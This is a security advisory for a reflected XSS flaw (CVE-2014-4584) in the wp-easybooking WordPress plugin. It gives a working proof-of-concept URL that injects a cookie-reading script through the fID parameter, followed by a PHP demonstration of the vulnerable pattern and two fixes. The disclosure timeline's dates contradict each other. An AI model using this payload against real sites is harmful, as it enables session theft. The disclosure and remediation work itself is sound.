wp-plugin : wp-easybooking – A3-Cross-Site Scripting (XSS)

 

Plugin Details

Plugin Name : wp-easybooking

Affected Version : 1.0.3 (and most probably lower versions, if any)

Vulnerability : A3-Cross-Site Scripting (XSS)

Identified by : Prajal Kulkarni

Technical Details

Minimum Level of Access Required : Unauthenticated

The fID query parameter of admin/editFacility.php is reflected into the response without output encoding (reflected XSS). The PoC below requests the PHP file directly rather than through a WordPress admin screen, so no WordPress login is involved; the payload opens with %27%3E (a single quote and a closing angle bracket) to break out of the attribute it lands in before injecting the script tag.

PoC - (Proof of Concept) :

 

http://localhost/wordpress/wp-content/wp-plugs/wpeasybooking/admin/editFacility.php?fID=fID%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&
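
The following is an added example, not code from the wp-easybooking plugin or from the advisory's author. render_vulnerable() reconstructs the pattern the PoC implies (the fID request parameter echoed unescaped inside a single-quoted HTML attribute); the plugin's real editFacility.php is not reproduced on this page, so the element, attribute name and quoting style are assumptions. The two fixed variants show the standard remedies: validate fID as an integer, or escape it for the attribute context. The sample input is the fID value taken from the PoC URL above.

```php
<?php
// Added example for this advisory; not the wp-easybooking plugin's own code.
// render_vulnerable() is an assumed reconstruction of the pattern the PoC
// implies; the plugin's real editFacility.php is not shown on the page.

// The fID value from the advisory's PoC URL, still URL-encoded (constructed input).
const POC_FID = "fID%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E";

function decoded_payload(): string {
    return urldecode(POC_FID); // fID'><script>alert(document.cookie)</script>
}

// Vulnerable pattern (assumed): no validation, no escaping. The payload's
// leading ' closes the attribute value, > closes the <input> tag, and the
// browser then parses <script>...</script> as real markup.
function render_vulnerable(string $fid): string {
    return "<input type='hidden' name='fID' value='" . $fid . "'>";
}

// Fix 1: a facility ID is a number, so validate it as one and refuse
// anything else. A bare integer can never break out of the attribute.
function render_fixed_int(string $fid): string {
    $id = filter_var($fid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    if ($id === false) {
        return '<p>Invalid facility ID.</p>';
    }
    return "<input type='hidden' name='fID' value='" . $id . "'>";
}

// Fix 2: if the value genuinely has to be free text, escape it for the
// attribute context. ENT_QUOTES encodes both ' and " so the result is safe
// in a single- or double-quoted attribute; inside WordPress, the core
// helper esc_attr() does the same job.
function render_fixed_escaped(string $fid): string {
    $safe = htmlspecialchars($fid, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<input type='hidden' name='fID' value='" . $safe . "'>";
}

// Check used below: does a raw <script tag survive into the rendered HTML?
function reflects_script_tag(string $html): bool {
    return stripos($html, '<script') !== false;
}

$payload = decoded_payload();
$renderers = [
    'vulnerable'     => 'render_vulnerable',
    'fixed (int)'    => 'render_fixed_int',
    'fixed (escape)' => 'render_fixed_escaped',
];
foreach ($renderers as $label => $fn) {
    $html = $fn($payload);
    printf("%-15s script reflected: %s\n  %s\n",
        $label, reflects_script_tag($html) ? 'YES' : 'no', $html);
}
```

Run it with `php example.php`: only the vulnerable renderer reports the script tag as reflected. The integer fix is the right one for an ID parameter because it rejects the input outright; the escaping fix is the fallback when the value must be echoed as text. Note that the trailing `&` in the PoC URL is just an empty extra query parameter and plays no part in the injection.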

 

Disclosure Timeline

Vendor Contacted : 2014-01-22

Plugin Status : Closed on 2014-01-11

Public Disclosure : April 25, 2014

CVE Number : CVE-2014-4584

 
Plugin Description :

The **wp-easybooking** plugin gives you the ability to create and manage multiple hotels, hotel owners and bookings.

It supports any language with the help of the free qTranslate plugin. It also provides an area in the administration panel where you can translate every message of the widget for each enabled language. No .po files and no .mo files, so no need for Poedit...

Gets currencies rates from the European Central Bank and converts all prices automatically.

The wp-easybooking widget is included so users may search for hotels and make their bookings. The search form includes an ajax pop up window with suggestions of Cities, Countries or Hotels that match the search term.

Users that have completed a booking receive a 4 digit PIN by email so that they may view their booking on-line.

Users do not need to register in order to make a booking.

Five booking statuses : Pending, Confirmed, Canceled, Completed and Expired. Hotel owners (and the administrator) may change the status of each booking and confirm the paid amount.

Users are informed of any outstanding balance (if they have not paid the full booking amount) on the booking's page.

Guests (users) may pay through bank transfer or PayPal.

A premium version also provides package deals (or business packs). In this way the administrator knows the amount that each hotel owes him. Charges are calculated automatically, based on the package deal, which can be a periodic charge (e.g. each month), a percentage of the bookings' cost, or a combination of both of these charging methods.

In short the free version provides the following features:

1. Unlimited Hotels,
2. Unlimited Hotel Owners (each owner can own unlimited hotels),
3. Hotel Owners have a separate role (Businessman) to log in to the administration area and manage their hotels and bookings,
4. Multilingual, with a translation menu for all messages of the widget (no .mo or .po files needed!),
5. Currency conversions (automatic),
6. Unlimited bookings,
7. Bookings management (statuses and payment balance),
8. Unlimited room types for each hotel,
9. A list of countries, regions and cities is included,
10. The admin can add as many new cities as needed, fast and easy, and also translate them at once,
11. Search and booking widget (users can search by location or hotel name),
12. Search by date only for available rooms depending on the number of adults, children and babies,
13. No need for users to register in order to make their booking,
14. Booking number and PIN sent for each booking for on-line access to the booking view page (which displays the booking's details),
15. Guests may pay through Bank or PayPal (PayPal payment gateway is included!)



For detailed documentation please read the instructions.pdf file or visit the plugin's website.

For any questions contact us at support@wp-easybooking.com
